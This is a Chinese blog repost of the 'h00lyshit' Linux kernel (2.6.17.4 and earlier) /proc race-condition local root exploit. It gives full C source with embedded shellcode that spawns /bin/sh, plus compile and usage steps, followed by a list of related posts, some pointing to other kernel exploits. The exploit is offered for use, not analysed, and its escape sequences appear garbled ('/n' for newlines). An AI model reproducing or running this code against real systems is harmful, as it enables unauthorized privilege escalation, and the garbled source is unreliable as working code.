Linux Kernel <= 2.6.17.4 (/proc) Local Root Exploit

转载 2007年10月11日 21:46:00
Rated as : Critical Risk
/*
** Author: h00lyshit
** Vulnerable: Linux 2.6 ALL
** Type of Vulnerability: Local Race
** Tested On : various distros
** Vendor Status: unknown
**
** Disclaimer:
** In no event shall the author be liable for any damages
** whatsoever arising out of or in connection with the use
** or spread of this information.
** Any use of this information is at the user's own risk.
**
** Compile:
** gcc h00lyshit.c -o h00lyshit
**
** Usage:
** h00lyshit <very big file on the disk>
**
** Example:
** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1
**
** if y0u dont have one, make big file (~100MB) in /tmp with dd
** and try to junk the cache e.g. cat /usr/lib/* >/dev/null
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <linux/a.out.h>
#include <asm/unistd.h>


static struct exec ex;
static char *e[256];
static char *a[4];
static char b[512];
static char t[256];
static volatile int *c;


/* h00lyshit shell code */
__asm__ (" __excode: call 1f /n"
" 1: mov $23, %eax /n"
" xor %ebx, %ebx /n"
" int $0x80 /n"
" pop %eax /n"
" mov $cmd-1b, %ebx /n"
" add %eax, %ebx /n"
" mov $arg-1b, %ecx /n"
" add %eax, %ecx /n"
" mov %ebx, (%ecx) /n"
" mov %ecx, %edx /n"
" add $4, %edx /n"
" mov $11, %eax /n"
" int $0x80 /n"
" mov $1, %eax /n"
" int $0x80 /n"
" arg: .quad 0x00, 0x00 /n"
" cmd: .string /"/bin/sh/" /n"
" __excode_e: nop /n"
" .global __excode /n"
" .global __excode_e /n"
);



extern void (*__excode) (void);
extern void (*__excode_e) (void);


void
error (char *err)
{
  perror (err);
  fflush (stderr);
  exit (1);
}


/* exploit this shit */
void
exploit (char *file)
{
  int i, fd;
  void *p;
  struct stat st;

  printf ("/ntrying to exploit %s/n/n", file);
  fflush (stdout);
  chmod ("/proc/self/environ", 04755);
  c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS,
0, 0);
  memset ((void *) c, 0, 4096);

  /*      slow down machine       */
  fd = open (file, O_RDONLY);
  fstat (fd, &st);
  p =
    (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd,
0);
  if (p == MAP_FAILED)
    error ("mmap");
  prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
  sprintf (t, "/proc/%d/environ", getpid ());
  sched_yield ();
  execve (NULL, a, e);
  madvise (0, 0, MADV_WILLNEED);
  i = fork ();

  /*      give it a try           */
  if (i)
    {    
      (*c)++;
      !madvise (p, st.st_size, MADV_WILLNEED) ? : error
("madvise");
      prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
      sched_yield ();
    }
  else
    {
    nice(10);
    while (!(*c));
sched_yield ();
      execve (t, a, e);
      error ("failed");
    }

  waitpid (i, NULL, 0);
  exit (0);
}


int
main (int ac, char **av)
{
  int i, j, k, s;
  char *p;

  memset (e, 0, sizeof (e));
  memset (a, 0, sizeof (a));
  a[0] = strdup (av[0]);
  a[1] = strdup (av[0]);
  a[2] = strdup (av[1]);

  if (ac < 2)
    error ("usage: binary <big file name>");
  if (ac > 2)
    exploit (av[2]);
  printf ("/npreparing");
  fflush (stdout);

  /*      make setuid a.out       */
  memset (&ex, 0, sizeof (ex));
  N_SET_MAGIC (ex, NMAGIC);
  N_SET_MACHTYPE (ex, M_386);
  s = ((unsigned) &__excode_e) - (unsigned) &__excode;
  ex.a_text = s;
  ex.a_syms = -(s + sizeof (ex));

  memset (b, 0, sizeof (b));
  memcpy (b, &ex, sizeof (ex));
  memcpy (b + sizeof (ex), &__excode, s);

  /*      make environment        */
  p = b;
  s += sizeof (ex);
  j = 0;
  for (i = k = 0; i < s; i++)
    {
      if (!p[i])
{
  e[j++] = &p[k];
  k = i + 1;
}
    }

  /*      reexec                  */
  getcwd (t, sizeof (t));
  strcat (t, "/");
  strcat (t, av[0]);
  execve (t, a, e);
  error ("execve");
  return 0;
}
 

OpenCL 设备 KERNEL 设计

开发 OpenCL 规范的主要目的是为了编写在异构平台上可移植、高性能程序。该规范主要面向软件库开发人员、软件工具商以及以性能提升为导向的程序开发人员。在该章节里的相关内容有助于对并行计算感兴趣的程序员了解异构计算和学习 OpenCL 编程的基本知识。在本章的学习结束之后,程序员们将会能够设计出简单的 OpenCL 设备代码,并且能在支持 OpenCL 的设备上调用这些代码。
  • 2015年11月17日 16:59

2.6.17 exp

  • 2014年05月11日 17:24
  • 11KB
  • 下载

2.4.22 exp

  • 2014年05月11日 17:23
  • 14KB
  • 下载

Linux kernel 2.6.18-20 2009 local root exploit

http://packetstormsecurity.org/0912-exploits/261820-exec.txt
  • cnbird2008
  • cnbird2008
  • 2009-12-28 15:13:00
  • 832

Linux kernel <= v3.15-rc4 本地提权 Exploit 已测

[8090sec@Test2 ~]$ id uid=501(8090sec) gid=501(8090sec) groups=501(8090sec) [8090sec@Test2 ~]$ wge...
  • god_7z1
  • god_7z1
  • 2014-05-24 04:32:25
  • 1507

linux kernel的cmdline参数解析原理分析

依据我的思路(时间顺序,如何开始,如何结束),首先看kernel下2种参数的注册。 第一种是kernel通用参数,如console=ttyS0,115200 root=/rdinit/init等。这...
  • skyflying2012
  • skyflying2012
  • 2014-11-15 09:43:30
  • 23060

linux参数之/proc/sys/kernel详解

Modprobe/modules_disabled 前者包含一个路径指向内核模块加载器(kernel module loader),用于加载内核模块;而后一个用于控制是否允许在系统启动后热插拔模块,...
  • salvary
  • salvary
  • 2015-05-16 22:29:03
  • 1728

Linux kernel exploit 研究和探索

  • 2008年12月30日 19:13
  • 343KB
  • 下载

/proc/sys/kernel/printk 打印log设置

/proc/sys/kernel/printk Printk 共有4个参数 Cat /proc/sys/kernel/printk 7 4 1 7 (1)第一个参数 7表示小于7优先级消息才会...
  • u012385733
  • u012385733
  • 2017-07-25 17:32:31
  • 1755

Linux的kernel变量之hostname

Linux 可通过hostname命令来查看本机的hostname。也可以直接cat/proc/sys/kernel/hostname查看。 #hostname #cat /proc/sys/ke...
  • zhaoxiatengkong_1
  • zhaoxiatengkong_1
  • 2013-03-07 13:10:50
  • 1239
收藏助手
不良信息举报
您举报文章:Linux Kernel <= 2.6.17.4 (/proc) Local Root Exploit
举报原因:
原因补充:

(最多只允许输入30个字)